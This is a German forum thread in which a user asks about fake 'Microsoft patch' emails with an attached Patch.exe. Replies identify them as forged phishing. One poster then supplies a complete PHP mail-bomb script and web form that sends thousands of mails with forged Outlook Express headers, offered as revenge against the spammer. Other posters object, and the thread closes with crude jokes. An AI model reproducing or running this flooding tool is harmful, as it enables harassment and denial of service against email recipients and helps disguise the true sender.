security@microsoft.com

cheesi

Ensign
Hab schon 2x eine Mail auf meine Gmx-Adresse bekommen mit dem
Subject: Use this patch immediately !
Text: Dear friend , use this Internet Explorer patch now!
There are dangerous virus in the Internet now!
More than 500.000 already infected!

Als Attachment ist noch eine Patch.exe mitgeschickt. Ich hab sie natürlich nicht aufgemacht. Kann die Mail überhaupt von microsoft sein, oder kann man sich so eine Adresse selbst erstellen? Wie beurteilt ihr diese Mail?

Das kommt mit hoher Wahrscheinlichkeit nicht von M$, Absender fälschen ist kein Prob! Lösch die Mails, sind sicher gefährlich!!

Definitiv nicht von Microsoft, da M$ zum einen keinen solchen Spam verschickt und zum anderen auch keine Patches direkt versenden, sondern bestenfalls auf Downloadmöglichkeiten innerhalb der M$-Website hinweisen würde. ;)

Ich habs sowieso nicht aufgemacht. Wollt nur wissen, ob ein Spam- oder Virenversender an eine Microsoftadresse kommt. M$ hat ja auch keine E-Mail-Adresse von mir. Der Patch hat nur wenige kb darum kann er ja auch definitiv nicht von M$, weil selbst kleine Sicherheitsupdates wesentlich größer sind.

bereits 4x

Hab seit dem ich ins Forum geschrieben habe, schon 3x diese Mail bekommen. Sie nervt wirklich. Am liebsten möchte ich :utrocket: :utminigun: mit dem Absender machen!

edit: Mittlerweile schon acht mal....

Zuletzt bearbeitet:
Ich hätte da für dich eine Lösung! Kopiere einfach diesen Text in eine Textdatei und gib ihr den Namen spam.php Dann das ganze auf eine Website die PHP unterstützten tut. Dann kannst du ihm das Postfach zu bomben mit mails, z.B. 100000 oder mehr aufeinmal schicken... :D :D :D

<?php

######################################################################
# Mail Function
######################################################################

function AntiSpam($fromemail,$fromname,$to,$betreff,$text,$format,$prio = "high",$bestaetigung = "no"){
if($prio == "high"){
$prioheader = "\nX-Priority: 1";
}
if($prio == "normal"){
$prioheader = "\nX-Priority: 3";
}
if($prio == "low"){
$prioheader = "\nX-Priority: 5";
}

// Lesebestätigung???
$besaetigungheader = "";
if($bestaetigung == "yes"){
$besaetigungheader = "\nDisposition-Notification-To: \"$fromname\" <$fromemail>";
}
// Eine Mail versenden
if($format == "text"){
$mailheader = "From: $fromname <$fromemail>\nReply-To: $fromemail\nX-Mailer: GrainBook".$prioheader.$besaetigungheader;
}elseif($format == "html"){
$mailheader = "From: $fromname <$fromemail>\nReply-To: $fromemail\nX-Mailer: Microsoft Outlook Express 6.00.2800.1158\nX-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165\nMIME-Version: 1.0\nContent-Type: text/html; charset=iso-8859-1\nContent-Transfer-Encoding: 8bit".$prioheader.$besaetigungheader;
}
mail(
$to,
$betreff,
$text,
$mailheader);
return true;
}

if($action == "start"){
echo "<b>Start sending ...</b><br><br>";
for($i=0;$i<$mailcount;$i++){
AntiSpam($fromemail,$fromname,$to,$betreff,$text,$format,"high","yes");
echo "$i, "; flush();
}
echo "<br><br><b>All Emails have been sent...</b> <a href=\"javascript:history.back();\">Back to the form</a>";
exit;
}

?>

<html>
<head>
<title>:: SPAM FIGHT ::</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#006666" text="#FFFFFF" link="#FFFFFF" vlink="#FFFFFF" alink="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="form1" method="post" action="">
<table width="100%" height="100%" border="0" cellpadding="3" cellspacing="3">
<tr>
<td height="50" bgcolor="#003333"><font size="5" face="Arial, Helvetica, sans-serif"><b>AntiSpam</b></font></td>
</tr>
<tr>
<td height="100%" align="left" valign="top"><table width="100%" border="0" cellspacing="3" cellpadding="3">
<tr>
<td nowrap><font size="2" face="Arial, Helvetica, sans-serif">Sender-Name:</font></td>
<td width="100%"><font size="2" face="Arial, Helvetica, sans-serif">
<input name="fromname" type="text" id="fromname" value="Your Name" size="50">
</font></td>
</tr>
<tr>
<td nowrap><font size="2" face="Arial, Helvetica, sans-serif">Sender-Email:</font></td>
<input name="fromemail" type="text" id="fromemail" value="you@youremail.com" size="50">
</font></td>
</tr>
<tr>
<td nowrap><font size="2" face="Arial, Helvetica, sans-serif">Subject:</font></td>
<input name="betreff" type="text" id="betreff" value="Your subject" size="50">
</font></td>
</tr>
<tr>
<td nowrap><font size="2" face="Arial, Helvetica, sans-serif">Recipient-Email:</font></td>
<td><font size="2" face="Arial, Helvetica, sans-serif">
<input name="to" type="text" id="to" value="recipient@recipient.com" size="50">
</font></td>
</tr>
<tr>
<td nowrap><font size="2" face="Arial, Helvetica, sans-serif">Text:</font></td>
<textarea name="text" cols="50" rows="10" id="text">The content of the spam mail you got!</textarea>
</font></td>
</tr>
<tr>
<td nowrap><font size="2" face="Arial, Helvetica, sans-serif">Format:</font></td>
<input name="format" type="radio" value="text" checked>
TEXT <br>
<input type="radio" name="format" value="html">
HTML</font></td>
</tr>
<tr>
<td nowrap><font size="2" face="Arial, Helvetica, sans-serif">Emails
to send:</font></td>
<input name="mailcount" type="text" id="mailcount" value="10000" size="10">
</font></td>
</tr>
<tr>
<td nowrap>&nbsp;</td>
<td><input type="submit" name="Submit" value="Start AntiSpam">
<input name="action" type="hidden" id="action" value="start"></td>
</tr>
</table></td>
</tr>
</table>
</form>
</body>
</html>

1. würde auf jeden halbwegs vernünftig konfigurierten Server die Zeit abrennen, bevor 100.000 Mails wegsind

2. würde wahrscheinlich auch das versende von so vielen Mails gesperrt sein

und 3tens wollen wir hier doch auch niemanden auf solche ideen bringen, geschweige denn, ihm die mittel dazu in die hand legen, oder?! ;)

Mach ich nicht

Sowas mach ich auch nicht, das ist nicht mein Stil, Böses mit Bösem zu bekämpfen.

Hab diese Mail heute allerdings schon wieder 3x mal bekommen. :mad:

hmmm, OKAY! :)

bring die sau um!:utenforcer: .... od :sex: sie!:p :p :p
:lol:

Zurück
Oben